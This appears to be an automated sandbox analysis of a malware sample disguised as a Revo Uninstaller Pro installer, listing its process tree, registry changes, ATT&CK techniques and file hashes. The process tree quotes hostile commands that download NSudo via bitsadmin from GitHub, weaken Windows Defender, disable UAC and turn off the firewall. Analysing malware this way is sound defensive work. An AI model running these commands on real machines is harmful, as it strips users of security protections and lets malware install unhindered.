\REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0 ruplp.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\RevoUninstallerPro.ruel\shell\open Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" ruplp.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2816 powershell.exe 1512 powershell.exe 1988 powershell.exe 3028 powershell.exe 2160 powershell.exe 2076 powershell.exe 1968 powershell.exe 1980 powershell.exe 1620 powershell.exe 2072 powershell.exe 2472 powershell.exe 2356 powershell.exe 1680 powershell.exe 1936 powershell.exe 1596 powershell.exe 1580 powershell.exe 2768 powershell.exe 2636 Revo Uninstaller Pro 4.2.3.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe 2612 afcdpsrv.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 3028 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 2208 rundll32.exe Token: SeRestorePrivilege 1476 7z.exe Token: 35 1476 7z.exe Token: SeSecurityPrivilege 1476 7z.exe Token: SeSecurityPrivilege 1476 7z.exe Token: SeRestorePrivilege 1956 7z.exe Token: 35 1956 7z.exe Token: SeSecurityPrivilege 1956 7z.exe Token: SeSecurityPrivilege 1956 7z.exe Token: SeRestorePrivilege 2104 7z.exe Token: 35 2104 7z.exe Token: SeSecurityPrivilege 2104 7z.exe Token: SeSecurityPrivilege 2104 7z.exe Token: SeDebugPrivilege 2612 afcdpsrv.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 2636 Revo Uninstaller Pro 4.2.3.tmp 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2220 RevoUninPro.exe 2220 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe 1916 RevoUninPro.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 3052 wrote to memory of 2292 3052 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 31 PID 2292 wrote to memory of 2860 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 32 PID 2292 wrote to memory of 2860 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 32 PID 2292 wrote to memory of 2860 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 32 PID 2292 wrote to memory of 2860 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 32 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2292 wrote to memory of 3068 2292 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 33 PID 2860 wrote to memory of 2896 2860 WScript.exe 34 PID 2860 wrote to memory of 2896 2860 WScript.exe 34 PID 2860 wrote to memory of 2896 2860 WScript.exe 34 PID 2860 wrote to memory of 2896 2860 WScript.exe 34 PID 2896 wrote to memory of 2952 2896 cmd.exe 36 PID 2896 wrote to memory of 2952 2896 cmd.exe 36 PID 2896 wrote to memory of 2952 2896 cmd.exe 36 PID 2896 wrote to memory of 2952 2896 cmd.exe 36 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 3068 wrote to memory of 2636 3068 Revo Uninstaller Pro 4.2.3.exe 37 PID 2896 wrote to memory of 2880 2896 cmd.exe 38 PID 2896 wrote to memory of 2880 2896 cmd.exe 38 PID 2896 wrote to memory of 2880 2896 cmd.exe 38 PID 2896 wrote to memory of 2880 2896 cmd.exe 38 PID 2896 wrote to memory of 2816 2896 cmd.exe 39 PID 2896 wrote to memory of 2816 2896 cmd.exe 39 PID 2896 wrote to memory of 2816 2896 cmd.exe 39 PID 2896 wrote to memory of 2816 2896 cmd.exe 39 PID 2896 wrote to memory of 1512 2896 cmd.exe 40 PID 2896 wrote to memory of 1512 2896 cmd.exe 40 PID 2896 wrote to memory of 1512 2896 cmd.exe 40 PID 2896 wrote to memory of 1512 2896 cmd.exe 40 PID 2896 wrote to memory of 1988 2896 cmd.exe 41 PID 2896 wrote to memory of 1988 2896 cmd.exe 41 PID 2896 wrote to memory of 1988 2896 cmd.exe 41 PID 2896 wrote to memory of 1988 2896 cmd.exe 41 PID 2896 wrote to memory of 3028 2896 cmd.exe 42 PID 2896 wrote to memory of 3028 2896 cmd.exe 42 PID 2896 wrote to memory of 3028 2896 cmd.exe 42 PID 2896 wrote to memory of 3028 2896 cmd.exe 42 PID 2896 wrote to memory of 2160 2896 cmd.exe 43 PID 2896 wrote to memory of 2160 2896 cmd.exe 43 PID 2896 wrote to memory of 2160 2896 cmd.exe 43 PID 2896 wrote to memory of 2160 2896 cmd.exe 43 PID 2896 wrote to memory of 2076 2896 cmd.exe 44 PID 2896 wrote to memory of 2076 2896 cmd.exe 44 PID 2896 wrote to memory of 2076 2896 cmd.exe 44 PID 2896 wrote to memory of 2076 2896 cmd.exe 44 PID 2896 wrote to memory of 1968 2896 cmd.exe 45 PID 2896 wrote to memory of 1968 2896 cmd.exe 45 PID 2896 wrote to memory of 1968 2896 cmd.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp"C:\Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp" /SL5="$400F4,18678062,848384,C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe5⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2308
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\RPKxchvc43an\main.bat" "4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:380 -
C:\Windows\SysWOW64\mode.commode 65,105⤵
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\ProgramData\RPKxchvc43an\7z.exe7z.exe e file.zip -p___________24467pwd13287pwd30257___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\ProgramData\RPKxchvc43an\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\ProgramData\RPKxchvc43an\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"afcdpsrv.exe"""5⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612 -
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"6⤵
- Executes dropped EXE
PID:2196
-
-
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"6⤵
- Executes dropped EXE
PID:2152
-
-
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"6⤵
- Executes dropped EXE
PID:1920
-
-
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"6⤵
- Executes dropped EXE
PID:608
-
-
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"6⤵
- Executes dropped EXE
PID:2396
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\RPKxchvc43an\delXPDUR9c.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Windows\SysWOW64\timeout.exetimeout /T 180 /NOBREAK5⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2880
-
-
-
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp"C:\Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3016E,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2636 -
C:\Windows\system32\rundll32.exe"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf5⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2208 -
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r6⤵
- Checks processor information in registry
PID:1812 -
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o7⤵PID:1980
-
-
-
-
C:\Windows\system32\regsvr32.exe"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s5⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Modifies registry class
PID:1912
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1532
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2220
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1916
-
-
-
-
-
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exeC:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2008
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
3Change Default File Association
1Component Object Model Hijacking
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
3Change Default File Association
1Component Object Model Hijacking
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5c37fb8c46d0281dd27768fd1101614f0
SHA103e736a49687f9ac10b35cc791e7df5b7e55f4d8
SHA256ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c
SHA512b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776
-
Filesize
114KB
MD56c9dbe894ea20eb190db6b483f17030d
SHA11bac02001cba8c083b987264f1bb89b05b74155f
SHA25624ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846
SHA512b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a
-
Filesize
2KB
MD5edc78deb34de240c787b1011161e9a4e
SHA12d31275530dce33d3bc329991c8ad59e1b303577
SHA25669569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b
-
Filesize
9.6MB
MD51dd8459f2595e4c0603ad491590f6952
SHA1607efe3c74388fb1e4b19f8f7ed2520ebfc349a1
SHA2565bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d
SHA512c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d
-
Filesize
96KB
MD5c84933bcccf41369ef9ecce015b86ed0
SHA1624713276ae217d8d05c03598eecd31209c7f77a
SHA256ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
22KB
MD5b0a7842dd51df8942bc8b837282d1c2b
SHA10e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA2564a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\93D4PXG4ZE155RCH4OQJ.temp
Filesize7KB
MD5ea33944eb622fb5332cf35788364e11d
SHA11ff1af45ff0373d13c037bc6154d6cf1511bd3d7
SHA256677dd8ef68601a92a918e5be910ca5f73e79027d0c7ef115f39a4a730c8ff290
SHA512f7126dcb1709e11f11b41a5a02456bd1edd09c1c4703c13a28af971a50f1f329c9e24adab4bd8bc888c7c7114fc49cf129ef57802be15d31069066e4a296676a
-
Filesize
39KB
MD5498c3d4d44382a96812a0e0ff28d575b
SHA1c34586b789ca5fe4336ab23ad6ff6eeb991c9612
SHA25623cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba
SHA512ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1
-
Filesize
14.2MB
MD5dc21d689cfa1860e8820ed0ee45b1f2a
SHA1acf2db6df76114601a2e58097629e0c8cbce129b
SHA25601732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140
-
Filesize
188KB
MD575d7bf3468669a6c3df6f4d048315128
SHA1678d3b531738573520367b47c0cd52cf5e431fa0
SHA256927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA5129c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e
-
Filesize
23.7MB
MD5ddb041550a3e69764cd9d7d3de3636f3
SHA11ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA25654e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA51200498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800
-
Filesize
3.0MB
MD540a7717c92235c89dfcc686c6c944653
SHA17a625cd006a6fbaa90f777b03e920e195fa3edd9
SHA256a1ddf79410b81fd2368c0b02fa30e10a1029c994216b67bab98b7d7ffd63d9a5
SHA512c98a32f9034c931538ef5f74aa177c63334cf1b562c97450985b04813bcf8d7b5e66d58ab68d23673a634260aab7be4c7873e1badfdd1262c2dc37464fac61d7
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
